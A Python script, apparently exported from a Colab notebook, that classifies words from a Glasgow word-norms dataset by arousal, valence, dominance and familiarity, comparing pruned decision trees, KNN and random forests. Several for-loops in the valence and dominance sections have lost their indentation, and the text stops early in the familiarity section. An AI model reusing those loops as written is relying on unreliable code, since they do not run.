zenith378/Data-Mining
|
424590ab09b2ce7cb83c4a80bc4d9140a646fe76
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""Copia di Classification.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/19w462hZ5-StoAmR7fA-GquAcs-hibbSU
"""
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sb
from matplotlib.ticker import AutoMinorLocator
from matplotlib import gridspec
#scaling, normalization
from sklearn.preprocessing import StandardScaler, MinMaxScaler, RobustScaler
from sklearn import metrics
from google.colab import files
# load the dataset
df = pd.read_csv('words_glasgow.csv')
# keep copies of the raw dataframe so later steps never mutate the original
dfcopy= df.copy()
df2 = df.copy()
# merge "imageability" and "concreteness" into one "perceivability" score
df2["perceivability"] = df2[["imageability", "concreteness"]].mean(axis=1)
df_perc=df2.drop(["concreteness","imageability"], axis=1)
dfprepro= df_perc.copy()
dfprepro=dfprepro.rename(columns={"gender": "masculinity"})
# impute missing web corpus frequencies with the column mean
dfprepro.loc[(dfprepro['web_corpus_freq'].isnull() == True), 'web_corpus_freq'] = dfprepro['web_corpus_freq'].mean()
dfprepro["web_corpus_log"] = pd.qcut(dfprepro["web_corpus_freq"], 10)  # bin web_corpus_freq into 10 quantile groups
dataframe = [dfprepro]
for dataset in dataframe:
    # recode raw frequencies into their order of magnitude (4..9)
    dataset.loc[(dataset["web_corpus_freq"] > 10000) & (dataset["web_corpus_freq"] <= 100000), "web_corpus_freq"] = 4
    dataset.loc[(dataset["web_corpus_freq"] > 100000) & (dataset["web_corpus_freq"] <= 1000000), "web_corpus_freq"] = 5
    dataset.loc[(dataset["web_corpus_freq"] > 1000000) & (dataset["web_corpus_freq"] <= 10000000), "web_corpus_freq"] = 6
    dataset.loc[(dataset["web_corpus_freq"] > 10000000) & (dataset["web_corpus_freq"] <= 100000000), "web_corpus_freq"] = 7
    dataset.loc[(dataset["web_corpus_freq"] > 100000000) & (dataset["web_corpus_freq"] <= 1000000000), "web_corpus_freq"] = 8
    dataset.loc[dataset["web_corpus_freq"] > 1000000000, "web_corpus_freq"] = 9
# the quantile-binned helper column and the word text are not used as features
dfprepro = dfprepro.drop(["web_corpus_log","word"], axis=1)
"""# Preprocess for classification"""
# per il decision tree
from sklearn.tree import DecisionTreeClassifier
from sklearn.model_selection import train_test_split
# visualizzarlo
from sklearn import tree
import pydotplus
from IPython.display import Image
# evaluazione
from sklearn.metrics import confusion_matrix
from sklearn.metrics import accuracy_score, f1_score, classification_report
from sklearn.metrics import roc_curve, auc, roc_auc_score
# hyperparameter tuning
from sklearn.model_selection import RandomizedSearchCV, GridSearchCV
# cross-validation
from sklearn.model_selection import cross_val_score
from sklearn.metrics import confusion_matrix
from sklearn.metrics import plot_confusion_matrix
from sklearn.model_selection import cross_val_score
from sklearn.neighbors import KNeighborsClassifier
from sklearn.ensemble import RandomForestClassifier
df_class_ref = dfprepro.copy()
# min-max scale every continuous predictor to [0, 1]
var_to_scale=['aoa',"arousal","valence","dominance","familiarity","semsize","masculinity","perceivability"]
features = df_class_ref[var_to_scale]
scaler = MinMaxScaler().fit(features.values)
features = scaler.transform(features.values)
df_class_ref[var_to_scale] = features
"""#Decision Tree (mostly) and comparison with other methods (binary varaibles only)
### Arousal
"""
refvar="arousal"
taglio=0.55
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
y_up_index = y >= taglio
y[y_up_index]=1
y_zero_index = y < taglio
y[y_zero_index]=0
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
clf_dt = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
plt.figure(figsize=(15,7.5))
from sklearn.tree import plot_tree
plot_tree(clf_dt,
filled=True,
rounded=True,
class_names=["not aroused","aroused"],
feature_names=X.columns)
from sklearn.metrics import confusion_matrix
from sklearn.metrics import plot_confusion_matrix
from sklearn.model_selection import cross_val_score
plot_confusion_matrix(clf_dt, X_test, y_test, display_labels=["not aroused","aroused"])
y_pred = clf_dt.predict(X_train)
y_pred = clf_dt.predict(X_test)
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred, average=None))
print(classification_report(y_test, y_pred))
y_score = clf_dt.predict_proba(X_test)
fpr, tpr, th = roc_curve(y_test, y_score[:,1])
roc_auc = auc(fpr, tpr)
print(roc_auc)
plt.figure(figsize=(8,5))
plt.plot(fpr, tpr, label='$AUC$ = %.3f' % (roc_auc))
plt.legend(loc="lower right", fontsize=14, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
# cost-complexity pruning: collect candidate alphas from the pruning path
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
ccp_alphas = ccp_alphas[:-1]  # drop the last alpha (trivial single-node tree)
clf_dts=[]
for ccp_alpha in ccp_alphas:
    clf_dt = DecisionTreeClassifier(random_state=0, ccp_alpha=ccp_alpha)
    clf_dt.fit(X_train, y_train)
    clf_dts.append(clf_dt)
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]
fig, ax =plt.subplots()
ax.set_xlabel("alpha")
ax.set_ylabel("accuracy")
ax.set_title("Accuracy vs alpha for training and testing sets")
ax.plot(ccp_alphas,train_scores, marker ='o',label='train',drawstyle='steps-post')
ax.plot(ccp_alphas,test_scores, marker ='o',label='test',drawstyle='steps-post')
ax.legend()
plt.show()
# 10-fold CV accuracy for one hand-picked alpha (0.003)
clf_dt = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42, ccp_alpha=0.003)
scores= cross_val_score(clf_dt,X_train,y_train, cv=10)
# NOTE(review): rebinds `df` (the raw dataset loaded above) — confirm intentional
df=pd.DataFrame(data={'tree':range(10), 'accuracy':scores})
df.plot(x='tree', y='accuracy',marker='o',linestyle='--')
# 10-fold CV over all candidate alphas; keep the one with best mean accuracy
alpha_loop_values =[]
for ccp_alpha in ccp_alphas:
    clf_dt = DecisionTreeClassifier(random_state=0, ccp_alpha=ccp_alpha)
    scores= cross_val_score(clf_dt,X_train,y_train, cv=10)
    alpha_loop_values.append([ccp_alpha,np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
                             columns=['alpha','mean_accuracy','std'])
alpha_results.plot(x='alpha',
                   y='mean_accuracy',
                   marker='o',
                   linestyle='--')
# zoom on the interesting alpha range (expression evaluated for display only)
alpha_results[(alpha_results['alpha']>0.001)
              &
              (alpha_results['alpha']<0.005)]
indexmax = alpha_results[['mean_accuracy']].idxmax()
maxalpha=alpha_results.loc[indexmax,'alpha']
ideal_ccp_alpha = float(maxalpha)
# refit with the CV-selected alpha and evaluate on the held-out test set
clf_dt_pruned = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
plot_confusion_matrix(clf_dt_pruned,
                      X_test,
                      y_test,
                      display_labels=['not aroused','aroused'])
plt.figure(figsize=(15,7.5))
from sklearn.tree import plot_tree
plot_tree(clf_dt_pruned,
          filled=True,
          rounded=True,
          class_names=["not aroused","aroused"],
          feature_names=X.columns)
y_pred = clf_dt_pruned.predict(X_train)  # NOTE(review): immediately overwritten
y_pred = clf_dt_pruned.predict(X_test)
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred,average='weighted'))
print(classification_report(y_test, y_pred))
# keep the gini-tree ROC for the combined plot below
y_score = clf_dt_pruned.predict_proba(X_test)
fpr_0, tpr_0, th_0 = roc_curve(y_test, y_score[:,1])
roc_auc_0 = auc(fpr_0, tpr_0)
#Entropy
# repeat the pruning workflow with the entropy criterion
clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
ccp_alphas = ccp_alphas[:-1]  # drop the trivial single-node alpha
clf_dts=[]
for ccp_alpha in ccp_alphas:
    clf_dt = DecisionTreeClassifier(criterion='entropy',random_state=0, ccp_alpha=ccp_alpha)
    clf_dt.fit(X_train, y_train)
    clf_dts.append(clf_dt)
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]
# select alpha by 10-fold CV mean accuracy
alpha_loop_values =[]
for ccp_alpha in ccp_alphas:
    clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=0, ccp_alpha=ccp_alpha)
    scores= cross_val_score(clf_dt,X_train,y_train, cv=10)
    alpha_loop_values.append([ccp_alpha,np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
                             columns=['alpha','mean_accuracy','std'])
indexmax = alpha_results[['mean_accuracy']].idxmax()
maxalpha=alpha_results.loc[indexmax,'alpha']
ideal_ccp_alpha = float(maxalpha)
print(ideal_ccp_alpha)
# refit with the selected alpha; keep the entropy-tree ROC for the combined plot
clf_dt_pruned = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
y_score = clf_dt_pruned.predict_proba(X_test)
fpr_en, tpr_en, th_en = roc_curve(y_test, y_score[:,1])
roc_auc_en = auc(fpr_en, tpr_en)
y_pred = clf_dt_pruned.predict(X_test)
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred,average='weighted'))
print(classification_report(y_test, y_pred))
# KNN: scan k = 1..39, score each on the held-out test set, keep the best
acc = []
# Will take some time
for i in range(1, 40):
    neigh = KNeighborsClassifier(n_neighbors=i).fit(X_train, y_train)
    yhat = neigh.predict(X_test)
    acc.append(metrics.accuracy_score(y_test, yhat))
# BUG FIX: acc[j] holds the score for k = j + 1 (the scan starts at k=1),
# so the best k is index + 1. The old code used the raw index, which was
# off by one and could even request the invalid n_neighbors=0.
best_k = acc.index(max(acc)) + 1
clf_knn = KNeighborsClassifier(n_neighbors=best_k)
# BUG FIX: fit on the training split only. The old code fitted on the
# full (X, y), leaking the test set into the model and inflating every
# metric reported below.
clf_knn.fit(X_train, y_train)
# keep the KNN ROC for the combined plot below
y_score = clf_knn.predict_proba(X_test)
fpr_KNN, tpr_KNN, th_KNN = roc_curve(y_test, y_score[:,1])
roc_auc_KNN = auc(fpr_KNN, tpr_KNN)
y_pred = clf_knn.predict(X_test)
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred,average='weighted'))
print(classification_report(y_test, y_pred))
# Instantiate model with 380 decision trees
model = RandomForestClassifier(n_estimators = 380, random_state = 42)
# Train the model on training data
ra=model.fit(X_train, y_train)
# keep the random-forest ROC for the combined plot below
y_score = model.predict_proba(X_test)
fpr_RF, tpr_RF, th_RF = roc_curve(y_test, y_score[:,1])
roc_auc_RF = auc(fpr_RF, tpr_RF)
y_pred = model.predict(X_test)
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred,average='weighted'))
print(classification_report(y_test, y_pred))
#Grid Search
# exhaustive search over tree hyper-parameters, scored by F1
clf_dt = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
param_list = {'max_depth': [None] + [2, 3, 4,5,6,7],
              'min_samples_split': [2, 5, 10, 15, 20,30,50,60,70,80,90,100],
              'min_samples_leaf': [1, 5, 10, 20,25,30,40,50]
              }
grid_search = GridSearchCV(clf_dt, param_grid=param_list, scoring='f1')
# NOTE(review): the grid search is fitted on the full (X, y), not only the
# training split — confirm whether including the test set is intentional.
grid_search.fit(X, y)
res = grid_search.cv_results_
def report(results, n_top=3):
    """Print the top-ranked cross-validation candidates.

    For each rank from 1 to *n_top*, every candidate holding that rank in
    ``results['rank_test_score']`` is printed with its mean validation
    score, standard deviation, and parameter set (``cv_results_`` layout).
    """
    for rank in range(1, n_top + 1):
        matching = np.flatnonzero(results['rank_test_score'] == rank)
        for idx in matching:
            mean_score = results['mean_test_score'][idx]
            std_score = results['std_test_score'][idx]
            print("Model with rank: {0}".format(rank))
            print("Mean validation score: {0:.3f} (std: {1:.3f})".format(
                mean_score, std_score))
            print("Parameters: {0}".format(results['params'][idx]))
            print("")
report(res, n_top=3)
# refit with the grid-search-suggested min_samples_leaf and evaluate
clf_dt_pruned = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=40,random_state=42)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
y_score = clf_dt_pruned.predict_proba(X_test)
fpr_c, tpr_c, th_c = roc_curve(y_test, y_score[:,1])
roc_auc_c = auc(fpr_c, tpr_c)
y_pred = clf_dt_pruned.predict(X_test)
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred,average='weighted'))
print(classification_report(y_test, y_pred))
plt.figure(figsize=(15,7.5))
from sklearn.tree import plot_tree
plot_tree(clf_dt_pruned,
          filled=True,
          rounded=True,
          class_names=["not aroused","aroused"],
          feature_names=X.columns)
# overlay the ROC curves of all classifiers for the arousal target
plt.figure(figsize=(8,5))
plt.plot(fpr_0, tpr_0,lw=3,label='$GINI_{AUC}$ = %.3f' % (roc_auc_0))
plt.plot(fpr_en, tpr_en,lw=3,label='$ENT_{AUC}$ = %.3f' % (roc_auc_en))
plt.plot(fpr_KNN, tpr_KNN,lw=3,label='$KNN_{AUC}$ = %.3f' % (roc_auc_KNN))
plt.plot(fpr_RF, tpr_RF,lw=3,label='$RAF_{AUC}$ = %.3f' % (roc_auc_RF))
#plt.plot(fpr_c, tpr_c,lw=3,label='$GR_{AUC}$ = %.3f' % (roc_auc_c))
plt.legend(loc="lower right", fontsize=18, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
"""### Valence"""
refvar="valence"
taglio=0.67
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
y_up_index = y >= taglio
y[y_up_index]=1
y_zero_index = y < taglio
y[y_zero_index]=0
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
clf_dt = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
ccp_alphas = ccp_alphas[:-1]
clf_dts=[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(random_state=0, ccp_alpha=ccp_alpha)
clf_dt.fit(X_train, y_train)
clf_dts.append(clf_dt)
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]
fig, ax =plt.subplots()
ax.set_xlabel("alpha")
ax.set_ylabel("accuracy")
ax.set_title("Accuracy vs alpha for training and testing sets")
ax.plot(ccp_alphas,train_scores, marker ='o',label='train',drawstyle='steps-post')
ax.plot(ccp_alphas,test_scores, marker ='o',label='test',drawstyle='steps-post')
ax.legend()
plt.show()
alpha_loop_values =[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=0, ccp_alpha=ccp_alpha)
scores= cross_val_score(clf_dt,X_train,y_train, cv=10)
alpha_loop_values.append([ccp_alpha,np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
columns=['alpha','mean_accuracy','std'])
alpha_results.plot(x='alpha',
y='mean_accuracy',
marker='o',
linestyle='--')
indexmax = alpha_results[['mean_accuracy']].idxmax()
maxalpha=alpha_results.loc[indexmax,'alpha']
ideal_ccp_alpha = float(maxalpha)
clf_dt_pruned = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
plt.figure(figsize=(15,7.5))
clf_dt_pruned.classes_
from sklearn.tree import plot_tree
plot_tree(clf_dt_pruned,
filled=True,
rounded=True,
class_names=[str(v) for v in clf_dt_pruned.classes_],
feature_names=X.columns)
y_pred = clf_dt_pruned.predict(X_train)
y_pred = clf_dt_pruned.predict(X_test)
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred,average='weighted'))
print(classification_report(y_test, y_pred))
y_score = clf_dt_pruned.predict_proba(X_test)
plot_confusion_matrix(clf_dt_pruned,
X_test,
y_test,
display_labels=['not val','val'])
fpr, tpr, th = roc_curve(y_test, y_score[:,1])
roc_auc = auc(fpr, tpr)
print(roc_auc)
plt.figure(figsize=(8,5))
plt.plot(fpr, tpr, label='$AUC$ = %.3f' % (roc_auc))
plt.legend(loc="lower right", fontsize=14, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
#ROC for Decision Tree (Gini)
fpr_0, tpr_0, th_0 = roc_curve(y_test, y_score[:,1])
roc_auc_0 = auc(fpr_0, tpr_0)
#Entropy
clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
ccp_alphas = ccp_alphas[:-1]
clf_dts=[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(criterion='entropy',random_state=0, ccp_alpha=ccp_alpha)
clf_dt.fit(X_train, y_train)
clf_dts.append(clf_dt)
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]
alpha_loop_values =[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=0, ccp_alpha=ccp_alpha)
scores= cross_val_score(clf_dt,X_train,y_train, cv=10)
alpha_loop_values.append([ccp_alpha,np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
columns=['alpha','mean_accuracy','std'])
indexmax = alpha_results[['mean_accuracy']].idxmax()
maxalpha=alpha_results.loc[indexmax,'alpha']
ideal_ccp_alpha = float(maxalpha)
print(ideal_ccp_alpha)
clf_dt_pruned = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
y_score = clf_dt_pruned.predict_proba(X_test)
fpr_en, tpr_en, th_en = roc_curve(y_test, y_score[:,1])
roc_auc_en = auc(fpr_en, tpr_en)
y_pred = clf_dt_pruned.predict(X_test)
print(classification_report(y_test, y_pred))
# --- KNN: search k = 1..39 for the best test accuracy. Will take some time. ---
acc = []
for k in range(1, 40):
    neigh = KNeighborsClassifier(n_neighbors=k).fit(X_train, y_train)
    acc.append(metrics.accuracy_score(y_test, neigh.predict(X_test)))
# Bug fix: acc[j] holds the score for n_neighbors = j + 1, so add 1 back.
# The old acc.index(max(acc)) was off by one and could even request
# n_neighbors=0, which scikit-learn rejects.
best_k = acc.index(max(acc)) + 1
clf_knn = KNeighborsClassifier(n_neighbors=best_k)
# Bug fix: fit on the training split only; fitting on the full (X, y)
# leaked the test set into the model and inflated the reported scores.
clf_knn.fit(X_train, y_train)
y_score = clf_knn.predict_proba(X_test)
fpr_KNN, tpr_KNN, th_KNN = roc_curve(y_test, y_score[:, 1])
roc_auc_KNN = auc(fpr_KNN, tpr_KNN)
y_pred = clf_knn.predict(X_test)
print(classification_report(y_test, y_pred))
# Instantiate model with 380 decision trees
model = RandomForestClassifier(n_estimators = 380, random_state = 42)
# Train the model on training data
ra=model.fit(X_train, y_train)
y_score = model.predict_proba(X_test)
fpr_RF, tpr_RF, th_RF = roc_curve(y_test, y_score[:,1])
roc_auc_RF = auc(fpr_RF, tpr_RF)
y_pred = model.predict(X_test)
print(classification_report(y_test, y_pred))
# Overlay the ROC curves of all four models (Gini/entropy trees, KNN, RF).
plt.figure(figsize=(8,5))
plt.plot(fpr_0, tpr_0,lw=3,label='$GINI_{AUC}$ = %.3f' % (roc_auc_0))
plt.plot(fpr_en, tpr_en,lw=3,label='$ENT_{AUC}$ = %.3f' % (roc_auc_en))
plt.plot(fpr_KNN, tpr_KNN,lw=3,label='$KNN_{AUC}$ = %.3f' % (roc_auc_KNN))
plt.plot(fpr_RF, tpr_RF,lw=3,label='$RAF_{AUC}$ = %.3f' % (roc_auc_RF))
#plt.plot(fpr_c, tpr_c,lw=3,label='$GR_{AUC}$ = %.3f' % (roc_auc_c))
plt.legend(loc="lower right", fontsize=18, frameon=False)
plt.plot([0,1], [0,1], 'k--')  # chance diagonal
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
"""### Dominance
"""
refvar="dominance"
taglio=0.57
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
y_up_index = y >= taglio
y[y_up_index]=1
y_zero_index = y < taglio
y[y_zero_index]=0
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
clf_dt = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
ccp_alphas = ccp_alphas[:-1]
clf_dts=[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(random_state=0, ccp_alpha=ccp_alpha)
clf_dt.fit(X_train, y_train)
clf_dts.append(clf_dt)
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]
fig, ax =plt.subplots()
ax.set_xlabel("alpha")
ax.set_ylabel("accuracy")
ax.set_title("Accuracy vs alpha for training and testing sets")
ax.plot(ccp_alphas,train_scores, marker ='o',label='train',drawstyle='steps-post')
ax.plot(ccp_alphas,test_scores, marker ='o',label='test',drawstyle='steps-post')
ax.legend()
plt.show()
alpha_loop_values =[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(random_state=42, ccp_alpha=ccp_alpha)
scores= cross_val_score(clf_dt,X_train,y_train, cv=10)
alpha_loop_values.append([ccp_alpha,np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
columns=['alpha','mean_accuracy','std'])
alpha_results.plot(x='alpha',
y='mean_accuracy',
marker='o',
linestyle='--')
indexmax = alpha_results[['mean_accuracy']].idxmax()
maxalpha=alpha_results.loc[indexmax,'alpha']
ideal_ccp_alpha = float(maxalpha)
clf_dt_pruned = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
plot_confusion_matrix(clf_dt_pruned,
X_test,
y_test,
display_labels=['not dominant','dominant'])
plt.figure(figsize=(15,7.5))
from sklearn.tree import plot_tree
plot_tree(clf_dt_pruned,
filled=True,
rounded=True,
class_names=["not dominant","dominant"],
feature_names=X.columns)
y_pred = clf_dt_pruned.predict(X_train)
y_pred = clf_dt_pruned.predict(X_test)
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred))
print(classification_report(y_test, y_pred))
y_score = clf_dt_pruned.predict_proba(X_test)
fpr, tpr, th = roc_curve(y_test, y_score[:,1])
roc_auc = auc(fpr, tpr)
print(roc_auc)
plt.figure(figsize=(8,5))
plt.plot(fpr, tpr, label='$AUC$ = %.3f' % (roc_auc))
plt.legend(loc="lower right", fontsize=14, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
# Keep the Gini tree's ROC (from the current y_score) for the
# model-comparison plot at the end of this section.
fpr_0, tpr_0, th_0 = roc_curve(y_test, y_score[:, 1])
roc_auc_0 = auc(fpr_0, tpr_0)

# --- Entropy criterion: same prune-and-evaluate pipeline. ---
clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1, random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
ccp_alphas = ccp_alphas[:-1]  # drop the trivial single-node alpha
clf_dts = []
for ccp_alpha in ccp_alphas:
    clf_dt = DecisionTreeClassifier(criterion='entropy', random_state=0, ccp_alpha=ccp_alpha)
    clf_dt.fit(X_train, y_train)
    clf_dts.append(clf_dt)
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]

# 10-fold CV accuracy per alpha.
alpha_loop_values = []
for ccp_alpha in ccp_alphas:
    clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1, random_state=0, ccp_alpha=ccp_alpha)
    scores = cross_val_score(clf_dt, X_train, y_train, cv=10)
    alpha_loop_values.append([ccp_alpha, np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
                             columns=['alpha', 'mean_accuracy', 'std'])
# Fix: float() on a length-1 Series is deprecated in pandas >= 2.1 —
# use the scalar label from Series.idxmax.
best_row = alpha_results['mean_accuracy'].idxmax()
ideal_ccp_alpha = float(alpha_results.loc[best_row, 'alpha'])
print(ideal_ccp_alpha)
clf_dt_pruned = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1, random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
y_score = clf_dt_pruned.predict_proba(X_test)
fpr_en, tpr_en, th_en = roc_curve(y_test, y_score[:, 1])
roc_auc_en = auc(fpr_en, tpr_en)
y_pred = clf_dt_pruned.predict(X_test)
print(classification_report(y_test, y_pred))
# --- KNN: search k = 1..39 for the best test accuracy. Will take some time. ---
acc = []
for k in range(1, 40):
    neigh = KNeighborsClassifier(n_neighbors=k).fit(X_train, y_train)
    acc.append(metrics.accuracy_score(y_test, neigh.predict(X_test)))
# Bug fix: acc[j] holds the score for n_neighbors = j + 1, so add 1 back.
# The old acc.index(max(acc)) was off by one and could even request
# n_neighbors=0, which scikit-learn rejects.
best_k = acc.index(max(acc)) + 1
clf_knn = KNeighborsClassifier(n_neighbors=best_k)
# Bug fix: fit on the training split only; fitting on the full (X, y)
# leaked the test set into the model and inflated the reported scores.
clf_knn.fit(X_train, y_train)
y_score = clf_knn.predict_proba(X_test)
fpr_KNN, tpr_KNN, th_KNN = roc_curve(y_test, y_score[:, 1])
roc_auc_KNN = auc(fpr_KNN, tpr_KNN)
y_pred = clf_knn.predict(X_test)
print(classification_report(y_test, y_pred))

# --- Random forest with 380 trees, trained on the training split. ---
model = RandomForestClassifier(n_estimators=380, random_state=42)
ra = model.fit(X_train, y_train)
y_score = model.predict_proba(X_test)
fpr_RF, tpr_RF, th_RF = roc_curve(y_test, y_score[:, 1])
roc_auc_RF = auc(fpr_RF, tpr_RF)
y_pred = model.predict(X_test)
print(classification_report(y_test, y_pred))

# --- Overlay the ROC curves of all four models. ---
plt.figure(figsize=(8, 5))
plt.plot(fpr_0, tpr_0, lw=3, label='$GINI_{AUC}$ = %.3f' % (roc_auc_0))
plt.plot(fpr_en, tpr_en, lw=3, label='$ENT_{AUC}$ = %.3f' % (roc_auc_en))
plt.plot(fpr_KNN, tpr_KNN, lw=3, label='$KNN_{AUC}$ = %.3f' % (roc_auc_KNN))
plt.plot(fpr_RF, tpr_RF, lw=3, label='$RAF_{AUC}$ = %.3f' % (roc_auc_RF))
plt.legend(loc="lower right", fontsize=18, frameon=False)
plt.plot([0, 1], [0, 1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
"""### Familiarity"""
refvar="familiarity"
taglio=0.6
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
y_up_index = y >= taglio
y[y_up_index]=1
y_zero_index = y < taglio
y[y_zero_index]=0
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
clf_dt = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
